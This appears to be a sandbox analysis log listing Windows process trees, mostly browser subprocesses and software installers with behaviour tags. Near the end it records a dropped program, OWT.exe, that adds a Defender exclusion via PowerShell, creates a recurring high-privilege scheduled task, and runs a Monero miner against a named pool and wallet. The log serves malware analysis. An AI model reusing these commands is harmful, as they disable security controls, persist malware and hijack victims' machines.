C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5964 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=142 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9096 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3124 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=144 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9288 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=145 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8868 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=8000 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=1520 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3036 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=8004 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6376 /prefetch:82⤵
-
-
C:\Users\Admin\Downloads\Hola-Browser-Agreed-Inst-C-Amb3.exe"C:\Users\Admin\Downloads\Hola-Browser-Agreed-Inst-C-Amb3.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\Downloads\Hola-Browser-Agreed-Inst-C-Amb3.exe"C:\Users\Admin\Downloads\Hola-Browser-Agreed-Inst-C-Amb3.exe" --monitor 18723⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1816 -s 17284⤵
- Program crash
-
-
-
C:\Users\Admin\AppData\Local\Temp\Hola-Setup-x64-1.203.908.exe"C:\Users\Admin\AppData\Local\Temp\Hola-Setup-x64-1.203.908.exe" --silent --agree --app browser --campaign amb3 --no-run-uis --no-rmt-conf --no-updater --no-hola-cr --track-download 6381d0a67ef1985987307a3a --hola-domain holavpninstaller.com3⤵
- Executes dropped EXE
-
C:\Program Files\Hola\app\net_updater64.exe"C:\Program Files\Hola\app\net_updater64.exe" --install win_hola.browser.hola.org4⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Local\Temp\Hola-Setup-x64-1.203.908.exe"C:\Users\Admin\AppData\Local\Temp\Hola-Setup-x64-1.203.908.exe" --silent --agree --app browser --campaign amb3 --no-run-uis --no-rmt-conf --no-updater --no-svc --hola-cr-path "C:\\Users\\Admin\\AppData\\Local\\Temp\\chromium-103.0.5060.114.12.zip" --track-download 6381d0a67ef1985987307a3a --hola-domain holavpninstaller.com3⤵
- Executes dropped EXE
-
C:\Program Files\Hola\app\7za.exe"C:\Program Files\Hola\app\7za.exe" x -o"C:\Program Files\Hola\temp" "C:\\Users\\Admin\\AppData\\Local\\Temp\\chromium-103.0.5060.114.12.zip" "chromium"4⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
-
-
C:\Users\Admin\AppData\Local\Temp\Hola-Setup-x64-1.203.908.exe"C:\Users\Admin\AppData\Local\Temp\Hola-Setup-x64-1.203.908.exe" --post-install-run --no-rmt-conf --app browser --track-download 6381d0a67ef1985987307a3a3⤵
- Executes dropped EXE
-
C:\Windows\explorer.exeexplorer "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Hola Browser.lnk"4⤵
-
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=151 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6624 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=152 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4600 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=153 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4944 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=154 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4964 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=9020 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7768 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=157 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7468 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=158 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9556 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=159 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8200 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=160 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9528 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=161 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5536 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=162 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4660 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=163 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9428 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=164 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=165 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7668 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=166 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4812 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=167 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9008 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=168 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7448 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=9988 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=172 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3944 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6032 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6908 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8408 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=169 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7668 /prefetch:12⤵
-
-
C:\Program Files\WinZip\winzip64.exe"C:\Program Files\WinZip\winzip64.exe" "C:\Users\Admin\Downloads\Active_File_1234pass_L9.rar"2⤵
- Checks computer location settings
- Checks whether UAC is enabled
- Drops desktop.ini file(s)
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookAW
- Suspicious use of SetWindowsHookEx
-
C:\Program Files\WinZip\WzCABCacheSyncHelper64.exe"C:\Program Files\WinZip\WzCABCacheSyncHelper64.exe"3⤵
-
-
C:\Program Files\WinZip\WzWipe32.exe"C:\Program Files\WinZip\WzWipe32.exe" "C:\Users\Admin\AppData\Local\Temp\wze648" /nWinZip3⤵
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=9108 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=176 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2528 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=177 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8568 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=178 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5080 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=179 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5204 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=180 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6620 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=181 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7088 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=182 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7288 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=183 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9360 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=185 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1520 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=184 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5184 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=186 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1108 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=187 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9352 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6440 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4660 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7328 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5988 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5804 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=9124 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=8376 /prefetch:82⤵
-
-
C:\Users\Admin\Downloads\fdm_x64_setup.exe"C:\Users\Admin\Downloads\fdm_x64_setup.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\is-9JQ85.tmp\fdm_x64_setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-9JQ85.tmp\fdm_x64_setup.tmp" /SL5="$D0484,34943088,780288,C:\Users\Admin\Downloads\fdm_x64_setup.exe"3⤵
- Drops file in Program Files directory
- Modifies Internet Explorer settings
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks.exe" /end /tn FreeDownloadManagerHelperService4⤵
-
-
C:\Windows\system32\schtasks.exe"schtasks.exe" /create /RU SYSTEM /tn FreeDownloadManagerHelperService /f /xml "C:\Program Files\Softdeluxe\Free Download Manager\service.xml"4⤵
- Creates scheduled task(s)
-
-
C:\Windows\system32\schtasks.exe"schtasks.exe" /change /tn FreeDownloadManagerHelperService /tr "\"C:\Program Files\Softdeluxe\Free Download Manager\helperservice.exe"\"4⤵
-
-
C:\Windows\system32\schtasks.exe"schtasks.exe" /run /tn FreeDownloadManagerHelperService4⤵
-
-
C:\Program Files\Softdeluxe\Free Download Manager\fdm.exe"C:\Program Files\Softdeluxe\Free Download Manager\fdm.exe" --install4⤵
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
-
C:\Program Files\Softdeluxe\Free Download Manager\importwizard.exe"C:\Program Files\Softdeluxe\Free Download Manager\importwizard" 3FE02402165644D986B63DE6638495E45⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.freedownloadmanager.org/afterinstall.html?os=windows&osversion=10&osarchitecture=x86_64&architecture=x86_64&version=6.18.1.4920&uuid=89989b3a-aeaf-4847-9588-cfa24f4312f9&locale=en_US&ac=1&au=15⤵
- Adds Run key to start application
- Enumerates system info in registry
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffebe9346f8,0x7ffebe934708,0x7ffebe9347186⤵
-
-
-
-
C:\Program Files\Softdeluxe\Free Download Manager\fdm5rhwin.exe"C:\Program Files\Softdeluxe\Free Download Manager\fdm5rhwin.exe" 21907CB0205CFF989F82C03684A01B86 phase14⤵
-
-
C:\Program Files\Softdeluxe\Free Download Manager\fdm5rhwin.exe"C:\Program Files\Softdeluxe\Free Download Manager\fdm5rhwin.exe" 21907CB0205CFF989F82C03684A01B86 phase24⤵
-
-
C:\Windows\system32\netsh.exe"netsh.exe" firewall add allowedprogram program="C:\Program Files\Softdeluxe\Free Download Manager\fdm.exe" name="Free Download Manager" ENABLE scope=ALL profile=ALL4⤵
- Modifies Windows Firewall
-
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=195 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7660 /prefetch:12⤵
-
-
C:\Program Files\WinZip\winzip64.exe"C:\Program Files\WinZip\winzip64.exe" "C:\Users\Admin\Downloads\File_ Cloud_Meadow_v0_1_3_0c_zip ___.vhd"2⤵
- Checks computer location settings
- Checks whether UAC is enabled
- Drops desktop.ini file(s)
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookAW
- Suspicious use of SetWindowsHookEx
-
C:\Program Files\WinZip\WzCABCacheSyncHelper64.exe"C:\Program Files\WinZip\WzCABCacheSyncHelper64.exe"3⤵
-
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x444 0x48c1⤵
-
C:\ProgramData\winrar\OWT.exeC:\ProgramData\winrar\OWT.exe1⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'2⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "OWT" /tr "C:\ProgramData\winrar\OWT.exe"2⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "OWT" /tr "C:\ProgramData\winrar\OWT.exe"3⤵
- Creates scheduled task(s)
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero2⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1284 -s 14922⤵
- Program crash
-
-
C:\Users\Admin\Downloads\winzip27.exe"C:\Users\Admin\Downloads\winzip27.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\e609762\winzip27.exerun=1 shortcut="C:\Users\Admin\Downloads\winzip27.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Modifies system executable filetype association
- Adds Run key to start application
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\srtasks.exeC:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:22⤵
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 610F2F811AED0825151CD8158AC1CB9A2⤵
- Loads dropped DLL
-
-
C:\Windows\System32\MsiExec.exeC:\Windows\System32\MsiExec.exe -Embedding 175C30A7F0D1815771A914E8F4DD28932⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\CloseFAH.exe"C:\Users\Admin\AppData\Local\Temp\CloseFAH.exe"3⤵
- Executes dropped EXE
-
-
